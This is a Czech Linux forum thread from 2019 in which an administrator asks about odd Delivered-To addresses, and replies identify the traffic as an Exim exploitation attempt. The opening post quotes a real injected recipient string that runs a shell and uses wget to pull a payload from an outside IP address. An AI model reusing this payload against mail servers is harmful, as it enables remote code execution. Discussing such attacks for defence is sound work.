Portál AbcLinuxu, 8. května 2024 13:22


Dotaz: Mail attack

11.7.2019 19:51 alkoholik | skóre: 40 | blog: Alkoholik
Mail attack
Přečteno: 519×
Odpovědět | Admin
Obcas mi prijde email adresovany velice zvlastnim zpusobem. V Delivered-To je neco jako:
root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f10.20.30.40x22}}@moje.domena
Je jasne, ze by se mel nekde pustit skript stazeny pres wget. Nemate nekdo tuseni, co presne se snazi prostrelit?
Misto 10.20.30.40 bylo moje skutecne ip a domenu jsem taky zmenil.

Řešení dotazu:

Nástroje: Začni sledovat (1) ?Zašle upozornění na váš email při vložení nového komentáře.

Odpovědi

Pavel 'TIGER' Růžička avatar 11.7.2019 20:19 Pavel 'TIGER' Růžička | skóre: 53
Rozbalit Rozbalit vše Re: Mail attack
Odpovědět | | Sbalit | Link | Blokovat | Admin
Vypadá to na novější "aktualizovanou verzi" pro získání údajů nad kontrolou domény.
11.7.2019 22:33 alkoholik | skóre: 40 | blog: Alkoholik
Rozbalit Rozbalit vše Re: Mail attack
Me spis zajima, ktery mail daemon/klient by jako mel mit ten super napad, ze pusti shell s wgetem. Exim? Postfix? Procmail? Nejaky soft na analyzovani logu?
Řešení 1× (alkoholik (tazatel))
Jendа avatar 12.7.2019 02:56 Jendа | skóre: 78 | blog: Jenda | JO70FB
Rozbalit Rozbalit vše Re: Mail attack
Odpovědět | | Sbalit | Link | Blokovat | Admin
Exim. Všimni si, že (minimálně v exempláři který přišel mně) je tam hromada Received: hlaviček.
Já to s tou denacifikací Slovenska myslel vážně.
12.7.2019 08:41 alkoholik | skóre: 40 | blog: Alkoholik
Rozbalit Rozbalit vše Re: Mail attack
Jo, muj vypada skoro stejne.
12.7.2019 13:53 madmucho
Rozbalit Rozbalit vše Re: Mail attack
Odpovědět | | Sbalit | Link | Blokovat | Admin
Vypadá to že to pouští patrně i filtr amavisu , našel jsem toto na svém serveru také,

neco to stahuje nedotahne, poslal mi to postfix jako že padlo na špatné hlavičky do karantény.

Received: 1 Received: 2 Received: 3 Received: 4 Received: 5 Received: 6 Received: 7 Received: 8 Received: 9 Received: 10 Received: 11 Received: 12 Received: 13 Received: 14 Received: 15 Received: 16 Received: 17 Received: 18 Received: 19 Received: 20 Received: 21 Received: 22 Received: 23 Received: 24 Received: 25 Received: 26 Received: 27 Received: 28 Received: 29 Received: 30 Received: 31 Message-Id: <20190711125952.3895A9F13B@bla bla> Date: Thu, 11 Jul 2019 14:59:52 +0200 (CEST) From: root@sab.com

Založit nové vláknoNahoru

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.